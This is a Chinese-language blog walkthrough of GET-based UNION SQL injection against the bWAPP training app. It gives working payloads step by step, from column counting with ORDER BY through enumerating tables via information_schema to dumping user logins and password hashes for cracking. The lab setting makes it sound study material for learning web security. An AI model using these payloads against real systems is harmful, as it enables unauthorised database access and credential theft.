SQL注入之GET型(select)

0x01:测试分析

我们进行测试这里是否存在SQL注入漏洞

输入'

点击go后

报错了,说明很大可能存在SQL注入漏洞了。

0x02:爆字段(字段就是这个数据表中的列)

-1 order by 1#

 -1 order by 2#

 

........ 

 -1 order by 7#

 

-1 order by 8#

 

所以可以判断出来,一共有7个列。

0x03:爆数据库名

 -1 union select 1,database(),user(),4,5,6,7 #

当前数据库名为bwapp 

0x04:爆表(即获取当前数据库有哪些表)

-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() #

经判断,当前查询方式有限制 limit 0,1

可以通过group_concat() 查询 

当前数据库有,五张表,分别是

blog,heroes,movies,users,visitors

0x05:获取后台账户用户名和密码

-- 查users表的列名 

 -1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='users'#

 users表中有9列,分别是

id,login,password,email,secret,activation_code,activated,reset_code,admin

 -- 查login和password的内容

-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from users#

 

获得两个账户 A.I.M.和 bee 

密码需要先解密

md5解密地址:cmd5.com

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值